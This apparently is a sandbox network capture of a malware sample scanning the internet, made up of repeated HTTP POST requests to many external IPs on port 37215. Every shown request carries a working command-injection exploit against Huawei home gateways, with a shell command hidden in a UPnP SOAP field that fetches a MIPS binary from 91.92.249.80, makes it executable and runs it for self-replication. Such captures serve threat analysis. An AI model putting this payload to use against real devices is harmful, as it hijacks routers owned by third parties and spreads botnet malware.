                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1539192.168.2.2337396197.186.233.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.484046936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1540192.168.2.234132841.84.204.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.484123945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1541192.168.2.235569441.211.174.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.484139919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1542192.168.2.234044641.46.153.19737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.484165907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1543192.168.2.234440073.220.128.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.484730005 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1544192.168.2.234870041.114.77.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.484771967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1545192.168.2.2360756157.244.140.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.484798908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1546192.168.2.236058441.237.139.037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.485744953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1547192.168.2.2344720157.58.152.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486258030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1548192.168.2.235740642.72.32.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.486262083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
